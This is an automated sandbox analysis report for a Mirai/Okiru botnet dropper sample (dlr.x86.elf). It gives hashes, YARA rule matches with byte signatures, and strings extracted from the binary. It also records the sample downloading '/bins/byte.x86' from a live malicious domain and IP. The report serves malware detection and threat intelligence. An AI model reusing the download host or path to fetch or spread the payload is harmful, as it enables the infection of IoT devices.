Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
dlr.x86.elf

Overview

General Information

Sample name:dlr.x86.elf
Analysis ID:1592423
MD5:3cd1a6dd920504f427b843a85df3bfaf
SHA1:464baee3d2dbd00f2e821de23b0e636f259e48d1
SHA256:6253a2fc1592cb56b4e02fb49e203fede42d16cf8c3d1825bba771b966adc37d
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai, Okiru
Score:84
Range:0 - 100
Whitelisted:false

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Yara detected Okiru
Machine Learning detection for dropped file
Found strings indicative of a multi-platform dropper
HTTP GET or POST without a user agent
Reads the 'hosts' file potentially containing internal network hosts
Sample has stripped symbol table
Writes ELF files to disk
Yara signature match

Classification

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1592423
Start date and time:2025-01-16 05:47:09 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 34s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:dlr.x86.elf
Detection:MAL
Classification:mal84.troj.linELF@0/1@1/0
  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Command:/tmp/dlr.x86.elf
PID:6218
Exit Code:5
Exit Code Info:
Killed:False
Standard Output:
byte
bro
Standard Error:
  • system is lnxubuntu20
  • dlr.x86.elf (PID: 6218, Parent: 6131, MD5: 3cd1a6dd920504f427b843a85df3bfaf) Arguments: /tmp/dlr.x86.elf
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
dlr.x86.elfLinux_Trojan_Mirai_cc93863bunknownunknown
  • 0x101a:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
SourceRuleDescriptionAuthorStrings
dump.pcapLinux_Trojan_Mirai_fa3ad9d0unknownunknown
  • 0x1728:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
dump.pcapLinux_Trojan_Mirai_b14f4c5dunknownunknown
  • 0x83ce:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
dump.pcapLinux_Trojan_Mirai_93fc3657unknownunknown
  • 0x17b3:$a: 00 00 00 89 44 24 60 89 D1 31 C0 8B 7C 24 28 FC F3 AB 89 D1 8B 7C
dump.pcapLinux_Trojan_Mirai_804f8e7cunknownunknown
  • 0x1659:$a: 31 ED 81 E1 FF 00 00 00 89 4C 24 58 89 EA C6 46 04 00 C1 FA 1F
dump.pcapLinux_Trojan_Mirai_99d78950unknownunknown
  • 0x246b:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00
  • 0x254b:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00
  • 0x2672:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00
  • 0x291d:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00
  • 0x2df1:$a: 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00
Click to see the 6 entries
SourceRuleDescriptionAuthorStrings
/tmp/byteJoeSecurity_OkiruYara detected OkiruJoe Security
    /tmp/byteJoeSecurity_Mirai_9Yara detected MiraiJoe Security
      /tmp/byteLinux_Trojan_Mirai_fa3ad9d0unknownunknown
      • 0x11aa:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
      /tmp/byteLinux_Trojan_Mirai_b14f4c5dunknownunknown
      • 0x7180:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
      /tmp/byteLinux_Trojan_Mirai_93fc3657unknownunknown
      • 0x1235:$a: 00 00 00 89 44 24 60 89 D1 31 C0 8B 7C 24 28 FC F3 AB 89 D1 8B 7C
      Click to see the 9 entries
      SourceRuleDescriptionAuthorStrings
      6218.1.0000000008048000.000000000804d000.r-x.sdmpLinux_Trojan_Mirai_cc93863bunknownunknown
      • 0x101a:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: /tmp/byteAvira: detection malicious, Label: EXP/ELF.Mirai.M
      Source: dlr.x86.elfReversingLabs: Detection: 18%
      Source: /tmp/byteJoe Sandbox ML: detected
      Source: byte.12.drString: byte/proc//proc/%s/exe/proc/self/exe/proc/proc/%d/cmdlinenetstatwgettftpcurlreboot/bin/busyboxvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/usr/lib/systemd/systemdshellmnt/sys/boot/media/srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearencodersystem/root/dvr_gui//root/dvr_app//anko-app//opt/soraJoshohajime902i13BzSxLxBxeYHOHO-LUGO7HOHO-U79OLJuYfouyf87NiGGeR69xdSO190Ij1XLOLKIKEEEDDEekjheory98escansh4MDMAfdevalvexscanspcMELTEDNINJAREALZflexsonskidsscanx86MISAKI-U79OLfoAxi102kxeswodjwodjwojMmKiy7f87lfreecookiex86sysgpufrgegesysupdater0DnAzepdNiGGeRD0nks69frgreu0x766f6964NiGGeRd0nks1337gafturasgbsigboa120i3UI49OaF3geaevaiolmao123123aOfurain0n4H34DggTrexewwasads1293194hjXDOthLaLosnggtwget-log1337SoraLOADERSAIAKINAggtq1378bfp919GRB1Q2SAIAKUSOggtr14FaSEXSLAVE1337ggtt1902a3u912u3u4haetrghbr19ju3dSORAojkf120hehahejeje922U2JDJA901F91SlaVLav12helpmedaddthhhhh2wgg9qphbqSlav3Th3seD3viceshzSmYZjYMQ5GbfSoRAxD123LOLiaGv5aA3SoRAxD420LOLinsomni640277SoraBeReppin1337ipcamCache66tlGg9QjUYfouyf876ke3TOKYO3lyEeaXul2dULCVxh93OfjHZ2zTY2gD6MZvKc7KU6rmMkiy6f87lA023UU4U24UIUTheWeekndmioribitchesA5p9TheWeekndsmnblkjpoiAbAdTokyosnebAkiruU8inTznetstatsAlexW9RCAKM20TnewnetwordAyo215WordnloadsWordmanenotyakuzaaBelchWordnetsobpBigN0gg0r420X0102I34fofhasfhiafhoiX19I239124UIUoismXSHJEHHEIIHWOolsVNwo12DeportedDeportedXkTer0GbA1onry0v03FortniteDownLOLZY0urM0mGaypussyfartlmaojkGrAcEnIgGeRaNnYvdGkqndCOqGeoRBe6BEGuiltyCrownZEuS69s4beBsEQhdHOHO-KSNDOZEuz69sat1234aj93hJ23scanHAalie293z0k2LscanJoshoARMHellInSideayyyGangShitscanJoshoARM5HighFryb1glscanJoshoARM6IWhPyucDbJboatnetzscanJoshoARM7IuYgujeIqnbtbatrtahzexsexscanJoshoM68KJJDUHEWBBBIBscanJoshoMIPSJSDGIEVIVAVIGcKbVkzGOPascanJoshoMPSLccADscanJoshoPPCKAZEN-OIU97chickenxingsscanJoshoSH4yakuskzm8KAZEN-PO78HcleanerscanJoshoSPCKAZEN-U79OLdbeefscanJoshoX86yakuz4c24KETASHI32ddrwelperscanarm5zPnr6HpQj2Kaishi-Iz90Ydeexecscanarm6zdrtfxcgyKatrina32doCP3fVjscanarm7zxcfhuioKsif91je39scanm68kKuasadvrhelperl33t_feetl33tl33tfeetscanmipsKuasaBinsMateeQnOhRk85rscanmpslLOLHHHOHOHBUIeXK20CL12ZnyamezyQBotBladeSPOOKYhikariwasherep4029x91xx32uhj4gbejhwizardzhra.outboatnetcondiheroshimaskid.dbglzrdPownedSecurity69.aresfxlyazsxhyUNSTABLEmoobotjnsd9sdoilayourmomgaeissdfjiougsiojOasisSEGRJIJHFVNHSNHEIHFOSapep999KOWAI-BAdAsVKOWAI-SADjHKipU7Ylairdropmalwareyour_verry_fucking_gayBig-Bro-Brightsefaexecshirololieagle.For-Gai-Mezy0x6axNLcloqkisvspookymythSwergjmioGKILLEJW(IU(JIWERGFJGJWJRGHetrhwewrtheIuFdKssCxzjSDFJIjioOnrYoXd666ewrtkjokethajbdf89wu823AAaasrdgsWsGA4@F6FGhostWuzHere666BOGOMIPSbeastmodedvrHelperbestmodesfc6aJfIuYDemon.xeno-is-godICY-P-0ODIJgSHUIHIfhwrgLhu87VhvQPzlunadakuexecbinTacoBellGodYololigangExecutionorbitclientAmnesiaOwariUnHAnaAWz3hirobbomiorieagledoxxRollielessie.hax.yakuzawordminerminerwordSinixV4hohog0dbu7tuorphicfurasshuhorizonassailantAresKawaiihelperECHOBOTDEMONS
      Source: global trafficHTTP traffic detected: GET /bins/byte.x86 HTTP/1.0Data Raw: 00 62 Data Ascii: b
      Source: /tmp/dlr.x86.elf (PID: 6218)Reads hosts file: /etc/hostsJump to behavior
      Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
      Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
      Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
      Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
      Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
      Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
      Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /bins/byte.x86 HTTP/1.0Data Raw: 00 62 Data Ascii: b
      Source: global trafficDNS traffic detected: DNS query: krkrdoskslansldkalsd.o-r.kr
      Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

      System Summary

      barindex
      Source: dlr.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
      Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
      Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
      Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_93fc3657 Author: unknown
      Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_804f8e7c Author: unknown
      Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_99d78950 Author: unknown
      Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_a68e498c Author: unknown
      Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
      Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
      Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
      Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
      Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
      Source: 6218.1.0000000008048000.000000000804d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
      Source: /tmp/byte, type: DROPPEDMatched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
      Source: /tmp/byte, type: DROPPEDMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
      Source: /tmp/byte, type: DROPPEDMatched rule: Linux_Trojan_Mirai_93fc3657 Author: unknown
      Source: /tmp/byte, type: DROPPEDMatched rule: Linux_Trojan_Mirai_804f8e7c Author: unknown
      Source: /tmp/byte, type: DROPPEDMatched rule: Linux_Trojan_Mirai_99d78950 Author: unknown
      Source: /tmp/byte, type: DROPPEDMatched rule: Linux_Trojan_Mirai_a68e498c Author: unknown
      Source: /tmp/byte, type: DROPPEDMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
      Source: /tmp/byte, type: DROPPEDMatched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
      Source: /tmp/byte, type: DROPPEDMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
      Source: /tmp/byte, type: DROPPEDMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
      Source: /tmp/byte, type: DROPPEDMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
      Source: /tmp/byte, type: DROPPEDMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
      Source: ELF static info symbol of initial sample.symtab present: no
      Source: dlr.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
      Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
      Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
      Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_93fc3657 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d01a9e85a01fad913ca048b60bda1e5a2762f534e5308132c1d3098ac3f561ee, id = 93fc3657-fd21-4e93-a728-c084fc0a6a4a, last_modified = 2021-09-16
      Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_804f8e7c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 1080d8502848d532a0b38861437485d98a41d945acaf3cb676a7a2a2f6793ac6, id = 804f8e7c-4786-42bc-92e4-c68c24ca530e, last_modified = 2021-09-16
      Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_99d78950 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3008edc4e7a099b64139a77d15ec0e2c3c1b55fc23ab156304571c4d14bc654c, id = 99d78950-ea23-4166-a85a-7a029209f5b1, last_modified = 2021-09-16
      Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_a68e498c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 951c9dfcba531e5112c872395f6c144c4bc8b71c666d2c7d9d8574a23c163883, id = a68e498c-0768-4321-ab65-42dd6ef85323, last_modified = 2021-09-16
      Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
      Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
      Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
      Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
      Source: dump.pcap, type: PCAPMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
      Source: 6218.1.0000000008048000.000000000804d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
      Source: /tmp/byte, type: DROPPEDMatched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
      Source: /tmp/byte, type: DROPPEDMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
      Source: /tmp/byte, type: DROPPEDMatched rule: Linux_Trojan_Mirai_93fc3657 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d01a9e85a01fad913ca048b60bda1e5a2762f534e5308132c1d3098ac3f561ee, id = 93fc3657-fd21-4e93-a728-c084fc0a6a4a, last_modified = 2021-09-16
      Source: /tmp/byte, type: DROPPEDMatched rule: Linux_Trojan_Mirai_804f8e7c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 1080d8502848d532a0b38861437485d98a41d945acaf3cb676a7a2a2f6793ac6, id = 804f8e7c-4786-42bc-92e4-c68c24ca530e, last_modified = 2021-09-16
      Source: /tmp/byte, type: DROPPEDMatched rule: Linux_Trojan_Mirai_99d78950 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3008edc4e7a099b64139a77d15ec0e2c3c1b55fc23ab156304571c4d14bc654c, id = 99d78950-ea23-4166-a85a-7a029209f5b1, last_modified = 2021-09-16
      Source: /tmp/byte, type: DROPPEDMatched rule: Linux_Trojan_Mirai_a68e498c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 951c9dfcba531e5112c872395f6c144c4bc8b71c666d2c7d9d8574a23c163883, id = a68e498c-0768-4321-ab65-42dd6ef85323, last_modified = 2021-09-16
      Source: /tmp/byte, type: DROPPEDMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
      Source: /tmp/byte, type: DROPPEDMatched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
      Source: /tmp/byte, type: DROPPEDMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
      Source: /tmp/byte, type: DROPPEDMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
      Source: /tmp/byte, type: DROPPEDMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
      Source: /tmp/byte, type: DROPPEDMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
      Source: classification engineClassification label: mal84.troj.linELF@0/1@1/0
      Source: /tmp/dlr.x86.elf (PID: 6218)File written: /tmp/byteJump to dropped file

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: /tmp/byte, type: DROPPED
      Source: Yara matchFile source: /tmp/byte, type: DROPPED

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: /tmp/byte, type: DROPPED
      Source: Yara matchFile source: /tmp/byte, type: DROPPED
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information1
      Scripting
      Valid AccountsWindows Management Instrumentation1
      Scripting
      Path InterceptionDirect Volume AccessOS Credential Dumping1
      File and Directory Discovery
      Remote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
      Ingress Tool Transfer
      Traffic DuplicationData Destruction
      No configs have been found
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Number of created Files
      • Is malicious
      • Internet
      SourceDetectionScannerLabelLink
      dlr.x86.elf18%ReversingLabsLinux.Backdoor.Mirai
      SourceDetectionScannerLabelLink
      /tmp/byte100%AviraEXP/ELF.Mirai.M
      /tmp/byte100%Joe Sandbox ML
      No Antivirus matches
      No Antivirus matches
      NameIPActiveMaliciousAntivirus DetectionReputation
      krkrdoskslansldkalsd.o-r.kr
      193.143.1.66
      truefalse
        high
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        193.143.1.66
        krkrdoskslansldkalsd.o-r.krunknown
        57271BITWEB-ASRUfalse
        109.202.202.202
        unknownSwitzerland
        13030INIT7CHfalse
        91.189.91.43
        unknownUnited Kingdom
        41231CANONICAL-ASGBfalse
        91.189.91.42
        unknownUnited Kingdom
        41231CANONICAL-ASGBfalse
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        193.143.1.66dlr.arm6.elfGet hashmaliciousMirai, OkiruBrowse
        • /bins/byte.arm6
        dlr.arm6.elfGet hashmaliciousMirai, OkiruBrowse
        • /bins/byte.arm6
